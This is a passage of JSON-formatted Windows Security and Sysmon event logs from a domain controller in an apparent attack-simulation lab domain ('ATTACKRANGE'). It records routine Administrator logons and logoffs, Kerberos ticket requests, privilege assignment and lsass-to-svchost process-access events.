\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220655,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E69E\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8e69e","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220656,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8FD1D\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8fd1d","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220657,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x90792\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x90792","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5921,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.753\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.753","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220658,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220659,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{4C751927-E2AD-2460-0186-DA75E1F84E27}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{4C751927-E2AD-2460-0186-DA75E1F84E27}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220660,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{4C751927-E2AD-2460-0186-DA75E1F84E27}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{4C751927-E2AD-2460-0186-DA75E1F84E27}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220661,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x93D4D\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{4C751927-E2AD-2460-0186-DA75E1F84E27}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x93d4d","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{4C751927-E2AD-2460-0186-DA75E1F84E27}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220662,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x93D4D\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x93d4d","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5922,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.753\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.753","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5923,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.753\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.753","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220663,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x93D4D\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x93d4d","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
